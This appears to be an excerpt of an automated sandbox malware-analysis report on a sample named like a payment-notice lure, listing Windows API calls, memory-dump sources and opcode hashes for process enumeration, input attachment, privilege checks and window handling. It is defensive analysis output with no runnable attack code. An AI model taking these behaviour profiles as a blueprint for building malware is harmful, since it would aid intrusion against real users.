                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                              • String ID:
                                                                              • API String ID: 432972143-0
                                                                              • Opcode ID: 036213c1031dfdddbf7a0a59a3837537220e30a1586b0d6c6ce2e820f7581468
                                                                              • Instruction ID: b59e71ed9ee1e18c2cb82873712a14425da008cc925beccc842d42b44cb6cf40
                                                                              • Opcode Fuzzy Hash: 036213c1031dfdddbf7a0a59a3837537220e30a1586b0d6c6ce2e820f7581468
                                                                              • Instruction Fuzzy Hash: EB313570A84319AFEF34CB658C84FFE7BA9AB89312F04471AE4C5931D0C3798D819792
                                                                              APIs
                                                                              • ClientToScreen.USER32(?,?), ref: 0097769A
                                                                              • GetWindowRect.USER32(?,?), ref: 00977710
                                                                              • PtInRect.USER32(?,?,00978B89), ref: 00977720
                                                                              • MessageBeep.USER32(00000000), ref: 0097778C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: 2398558f3b9e71276d817cd3f5b2c66853d143082f007aee5cbaf8581401d097
                                                                              • Instruction ID: f48a8323bf33ebe074cf6054f051a75c84be3a448517bf5bf871732f5a14a93a
                                                                              • Opcode Fuzzy Hash: 2398558f3b9e71276d817cd3f5b2c66853d143082f007aee5cbaf8581401d097
                                                                              • Instruction Fuzzy Hash: 8741AD36609255EFCB09CF98D894EA9B7F5FB49314F1481A8E418DB261C330A941DF90
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 009716EB
                                                                                • Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
                                                                                • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
                                                                                • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
                                                                              • GetCaretPos.USER32(?), ref: 009716FF
                                                                              • ClientToScreen.USER32(00000000,?), ref: 0097174C
                                                                              • GetForegroundWindow.USER32 ref: 00971752
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: 7cd6a3dd966574fb99a64b82a545b779eb080a4328275a09736ce879dfee0c08
                                                                              • Instruction ID: 91bd04c14affa14c1718ffaa3ed09077244aa6040641703d36e92ec6fcffcfe0
                                                                              • Opcode Fuzzy Hash: 7cd6a3dd966574fb99a64b82a545b779eb080a4328275a09736ce879dfee0c08
                                                                              • Instruction Fuzzy Hash: 41313072D00149AFC704DFAAC881DAEB7FDFF49304B548069E415E7211EA31DE45CBA1
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0094D501
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0094D50F
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0094D52F
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0094D5DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 420147892-0
                                                                              • Opcode ID: c31f6f7d159e75da9082e11babd8f9de8413f67a765ab442ba8dab2af72469a5
                                                                              • Instruction ID: 2061983c3a9cb624577068aae2c3461ab83a0aa378723831d8c5fe8342693896
                                                                              • Opcode Fuzzy Hash: c31f6f7d159e75da9082e11babd8f9de8413f67a765ab442ba8dab2af72469a5
                                                                              • Instruction Fuzzy Hash: FF317E721082409FD304EF54C881EAFBBE8FF9A354F54092DF585861A1EB71AA85CB93
                                                                              APIs
                                                                                • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                              • GetCursorPos.USER32(?), ref: 00979001
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00937711,?,?,?,?,?), ref: 00979016
                                                                              • GetCursorPos.USER32(?), ref: 0097905E
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00937711,?,?,?), ref: 00979094
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                              • String ID:
                                                                              • API String ID: 2864067406-0
                                                                              • Opcode ID: 3be6b526146d9996a51fa745707030d7b07a11cfbaaa98d3f00ab2a843bda33a
                                                                              • Instruction ID: a5a181798e08ac5fb962bdb22d444c5cb8e0699caccaaf92cd9bf1e41bec8d18
                                                                              • Opcode Fuzzy Hash: 3be6b526146d9996a51fa745707030d7b07a11cfbaaa98d3f00ab2a843bda33a
                                                                              • Instruction Fuzzy Hash: DA21A336621018EFDB258F94CC58EFA7BF9FF89360F048159F90987161C3319990EB60
                                                                              APIs
                                                                              • GetFileAttributesW.KERNEL32(?,0097CB68), ref: 0094D2FB
                                                                              • GetLastError.KERNEL32 ref: 0094D30A
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0094D319
                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0097CB68), ref: 0094D376
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 2267087916-0
                                                                              • Opcode ID: 02367dba8aeeb4de9f63614c020dc2386e8a5009aebe2aa4b5c6806b08350064
                                                                              • Instruction ID: a58cf01a0d4179cab1835d37d15f70d14eae0d63e11986a762f76b1fcee105d4
                                                                              • Opcode Fuzzy Hash: 02367dba8aeeb4de9f63614c020dc2386e8a5009aebe2aa4b5c6806b08350064
                                                                              • Instruction Fuzzy Hash: 3B21A17550A2019F8710DF28C88186A77E8FF96368F504A5DF4A9D32A1E730DE45CB93
                                                                              APIs
                                                                                • Part of subcall function 00941014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0094102A
                                                                                • Part of subcall function 00941014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00941036
                                                                                • Part of subcall function 00941014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941045
                                                                                • Part of subcall function 00941014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0094104C
                                                                                • Part of subcall function 00941014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941062
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009415BE
                                                                              • _memcmp.LIBVCRUNTIME ref: 009415E1
                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00941617
                                                                              • HeapFree.KERNEL32(00000000), ref: 0094161E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                              • String ID:
                                                                              • API String ID: 1592001646-0
                                                                              • Opcode ID: 85732f6af64434cdec1c5d98b85111780b45edaaffcf43c956d3182943231252
                                                                              • Instruction ID: 26fcaa3b8d33b97adfb13a1e8b815006dcf237504a5750bdc52120595d24c009
                                                                              • Opcode Fuzzy Hash: 85732f6af64434cdec1c5d98b85111780b45edaaffcf43c956d3182943231252
                                                                              • Instruction Fuzzy Hash: 56219A72E00209EFDF04DFA4C945FEEB7B8EF84344F098459E445AB241E730AA85DBA0
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0097280A
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00972824
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00972832
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00972840
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$AttributesLayered
                                                                              • String ID:
                                                                              • API String ID: 2169480361-0
                                                                              • Opcode ID: 8f8d4ae05ca392f26cee1384ea37f888cec8687bf8091b4db77a077cf0def1cd
                                                                              • Instruction ID: 230b6cb9ed3c17b6e12dbbb1dd08865fce5b84de65f712e9e01a0af57042a205
                                                                              • Opcode Fuzzy Hash: 8f8d4ae05ca392f26cee1384ea37f888cec8687bf8091b4db77a077cf0def1cd
                                                                              • Instruction Fuzzy Hash: B621B632618511AFD7149B24C845FAA7B99FF86324F14815CF42ACB6D2C776FC82C791
                                                                              APIs
                                                                                • Part of subcall function 00948D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?), ref: 00948D8C
                                                                                • Part of subcall function 00948D7D: lstrcpyW.KERNEL32(00000000,?,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00948DB2
                                                                                • Part of subcall function 00948D7D: lstrcmpiW.KERNEL32(00000000,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?), ref: 00948DE3
                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947923
                                                                              • lstrcpyW.KERNEL32(00000000,?,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947949
                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947984
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                              • String ID: cdecl
                                                                              • API String ID: 4031866154-3896280584
                                                                              • Opcode ID: 436dde620dcfc4baf244b0b30a7aa0ba097da21b64da3e6f3d5e5e73197cc9aa
                                                                              • Instruction ID: b9fa31bf7f25157a83a17f49247fb541627d2f41856c1c83fa24383412860a2d
                                                                              • Opcode Fuzzy Hash: 436dde620dcfc4baf244b0b30a7aa0ba097da21b64da3e6f3d5e5e73197cc9aa
                                                                              • Instruction Fuzzy Hash: 7B11223A204346AFCB159F78C844E7BB7A9FF85390B40402AF906CB3A4EB319801D7A1
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00977D0B
                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00977D2A
                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00977D42
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0095B7AD,00000000), ref: 00977D6B
                                                                                • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID:
                                                                              • API String ID: 847901565-0
                                                                              • Opcode ID: 0d39629b581245c1a10147dae865189388275a1f61a07fc5031dc22c49c4563a
                                                                              • Instruction ID: 3627afa4ac1c868c5480653976e53bc5e113838925bf1d049806bb73ebe4bc52
                                                                              • Opcode Fuzzy Hash: 0d39629b581245c1a10147dae865189388275a1f61a07fc5031dc22c49c4563a
                                                                              • Instruction Fuzzy Hash: 8511D233118615AFCB208FA8DC04AA67BA8BF85370B158728F83DC72F0D7318960DB90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001060,?,00000004), ref: 009756BB
                                                                              • _wcslen.LIBCMT ref: 009756CD
                                                                              • _wcslen.LIBCMT ref: 009756D8
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00975816
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen
                                                                              • String ID:
                                                                              • API String ID: 455545452-0
                                                                              • Opcode ID: aa7f5b34a3cd3efd689a57e2e7adf04140d3166ec5afcb51b215f7e255bf7128
                                                                              • Instruction ID: efe0420b01e764d04e5245719990b3ce7cbbdf5bad128238048a8c26e3d98494
                                                                              • Opcode Fuzzy Hash: aa7f5b34a3cd3efd689a57e2e7adf04140d3166ec5afcb51b215f7e255bf7128
                                                                              • Instruction Fuzzy Hash: 1C11D373A006089ADF609F61CC85AEE77ACEF50764F51C42AFA1DD6081E7B4DA80CB60
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 691c56d1b9f67975dd4181d5746375ca0a92c5bb13d612fcc822139cc490ae09
                                                                              • Instruction ID: a8b39d6e58f755a5e5d27de30427aa0e6f47725530b29feac309c3bf7014be15
                                                                              • Opcode Fuzzy Hash: 691c56d1b9f67975dd4181d5746375ca0a92c5bb13d612fcc822139cc490ae09
                                                                              • Instruction Fuzzy Hash: 100162B631961E7FF61126787CC1FA7671DDF813B8B340729F635551D2DB608C905160
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00941A47
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A59
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A6F
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A8A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 77a23dfa78c7c64420961047ebf48eab09e82899bd551fec170d9b9f6f91bf66
                                                                              • Instruction ID: f5e2fff707b31e11993dae7f4fedebc56b1f99e6e61a399b769761c2b77bd29d
                                                                              • Opcode Fuzzy Hash: 77a23dfa78c7c64420961047ebf48eab09e82899bd551fec170d9b9f6f91bf66
                                                                              • Instruction Fuzzy Hash: 5611397AD01219FFEF10DBA4CD85FADBB78EB08750F200495EA04B7290D671AE90DB94
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0094E1FD
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 0094E230
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0094E246
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0094E24D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2880819207-0
                                                                              • Opcode ID: 74b61ef5c8fa9472da737143d60e93a966090ea6b75862f0afb196b87e573966
                                                                              • Instruction ID: 8d1c0cae9255499256d2bcb6e09085ff97e937d7e828686580589d5aa7e7f862
                                                                              • Opcode Fuzzy Hash: 74b61ef5c8fa9472da737143d60e93a966090ea6b75862f0afb196b87e573966
                                                                              • Instruction Fuzzy Hash: 43112BB6918214BFC7019FA89C09EAF7FECAB45320F404329F825E3290D6B0CD0097A0
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,?,0090CFF9,00000000,00000004,00000000), ref: 0090D218
                                                                              • GetLastError.KERNEL32 ref: 0090D224
                                                                              • __dosmaperr.LIBCMT ref: 0090D22B
                                                                              • ResumeThread.KERNEL32(00000000), ref: 0090D249
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                              • String ID:
                                                                              • API String ID: 173952441-0
                                                                              • Opcode ID: c599bee6fbadac923d0c820bb22fb3065eaf4e577988f5274e0a4c7a26a0fd65
                                                                              • Instruction ID: a5ff52068f46bc04b82b962676f3263f122d43287ea961e30d86e02722f6d906
                                                                              • Opcode Fuzzy Hash: c599bee6fbadac923d0c820bb22fb3065eaf4e577988f5274e0a4c7a26a0fd65
                                                                              • Instruction Fuzzy Hash: 1101D27680A208BFDB216BE9DC09BAE7A6DDFC1730F100219F939961D0CF718941D7A0
                                                                              APIs
                                                                                • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                              • GetClientRect.USER32(?,?), ref: 00979F31
                                                                              • GetCursorPos.USER32(?), ref: 00979F3B
                                                                              • ScreenToClient.USER32(?,?), ref: 00979F46
                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00979F7A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 4127811313-0
